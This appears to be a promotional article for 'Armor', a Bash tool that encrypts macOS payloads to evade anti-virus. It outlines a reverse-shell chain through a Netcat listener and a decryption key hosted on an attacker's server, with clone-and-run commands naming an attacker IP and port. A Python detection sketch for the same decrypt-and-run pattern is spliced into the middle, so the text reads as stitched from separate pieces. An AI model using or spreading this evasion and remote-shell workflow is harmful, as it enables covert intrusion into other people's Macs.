Armor: A Powerful macOS Payload Encryption Tool

Introduction

In today’s cybersecurity landscape, bypassing anti-virus scanning tools has become a significant challenge. To address this issue, we introduce Armor, a powerful macOS payload encryption tool written in Bash. Armor creates encrypted payloads that can evade detection by anti-virus engines, making it an essential tool for any macOS attacker.

How Armor Works

Armor can be used in conjunction with Netcat to establish a TCP connection between the attacker’s system and the target macOS system. The process involves the following steps:

  1. Netcat Listener: The attacker sets up a Netcat listener on their system, listening on port 4444.
  2. Payload Execution: The attacker executes the Armor script on the target macOS system, which reads the contents of the “payload.txt” file. This file contains the encrypted Bash code.
  3. Decryption: The Armor script decrypts the Bash code using the decryption key hosted on the attacker’s server.
  4. Execution: The decrypted Bash code is executed on the target system, establishing a connection to the Netcat listener.
  5. Termination: Once the connection is established, the Netcat listener terminates.
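Seen from the endpoint, the steps above produce a correlated trace: one process tree contacts a remote host, invokes an OpenSSL/LibreSSL decrypt, and starts a shell with no script file. The following detection sketch is an added example, not code from the Armor project; the event schema, sample records, internal address ranges and 30-second window are all assumptions, and the sample command lines are constructed rather than taken from Armor.

```python
import ipaddress
# Assumed internal ranges; connections to these are not counted as egress.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
SHELLS = {"bash", "sh", "zsh"}
WINDOW = 30  # seconds; assumed correlation window

# Constructed telemetry, not captured from a real host or from Armor itself.
EVENTS = [
    {"ts": 100, "pid": 501, "ppid": 1, "kind": "exec", "argv": ["bash", "script.sh"]},
    {"ts": 101, "pid": 502, "ppid": 501, "kind": "connect", "dst": "203.0.113.7", "port": 443},
    {"ts": 101, "pid": 503, "ppid": 501, "kind": "exec",
     "argv": ["openssl", "enc", "-d", "-aes-256-cbc", "-in", "payload.txt"]},
    {"ts": 102, "pid": 504, "ppid": 501, "kind": "exec", "argv": ["bash"]},
    {"ts": 102, "pid": 504, "ppid": 501, "kind": "connect", "dst": "203.0.113.7", "port": 4444},
    # Benign look-alike: a backup job decrypts locally and talks to an internal DB.
    {"ts": 300, "pid": 700, "ppid": 1, "kind": "exec", "argv": ["bash", "backup.sh"]},
    {"ts": 301, "pid": 701, "ppid": 700, "kind": "exec",
     "argv": ["openssl", "enc", "-d", "-aes-256-cbc", "-in", "db.enc"]},
    {"ts": 302, "pid": 702, "ppid": 700, "kind": "connect", "dst": "10.0.0.5", "port": 5432},
]

def signal(ev):
    """Classify one event as 'egress', 'decrypt', 'stdin_shell' or None."""
    if ev["kind"] == "connect":
        dst = ipaddress.ip_address(ev["dst"])
        return None if any(dst in net for net in INTERNAL) else "egress"
    argv = ev["argv"]
    name = argv[0].rsplit("/", 1)[-1]
    if name == "openssl" and "enc" in argv and "-d" in argv:
        return "decrypt"
    if name in SHELLS and all(a.startswith("-") for a in argv[1:]):
        return "stdin_shell"  # no script file argument: commands arrive on stdin
    return None

def find_decrypt_and_run(events, window=WINDOW):
    """Return root PIDs whose process tree shows all three signals within `window` seconds."""
    parent = {e["pid"]: e["ppid"] for e in events}
    def root(pid, hops=64):  # hop limit guards against PID-reuse cycles
        while parent.get(pid) in parent and hops:
            pid, hops = parent[pid], hops - 1
        return pid
    first_seen = {}  # root pid -> {signal: timestamp of first occurrence}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if (sig := signal(ev)):
            first_seen.setdefault(root(ev["pid"]), {}).setdefault(sig, ev["ts"])
    return sorted(r for r, s in first_seen.items()
                  if len(s) == 3 and max(s.values()) - min(s.values()) <= window)
```

On the constructed events, `find_decrypt_and_run(EVENTS)` returns `[501]`; the backup job under PID 700 is not flagged because it shows only the decrypt signal.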

Installation

To install Armor, you need LibreSSL on your system. If LibreSSL is not installed, Armor will help you install it automatically; the relevant code is in the armor.sh file. You also need Ncat, which can be installed using the following command:

$ apt-get update && apt-get install nmap

Cloning and Execution

To clone and execute the Armor tool, use the following commands:

git clone https://github.com/tokyoneon/Armor
cd Armor
chmod +x armor.sh
./armor.sh /path/to/payload.txt 1.2.3.4 443

In this command:

  • /path/to/payload.txt is the path to the encrypted payload file.
  • 1.2.3.4 is the IP address of the attacker’s server hosting the decryption key.
  • 443 is the server port number.

Project Address

The Armor project can be found on GitHub: https://github.com/tokyoneon/Armor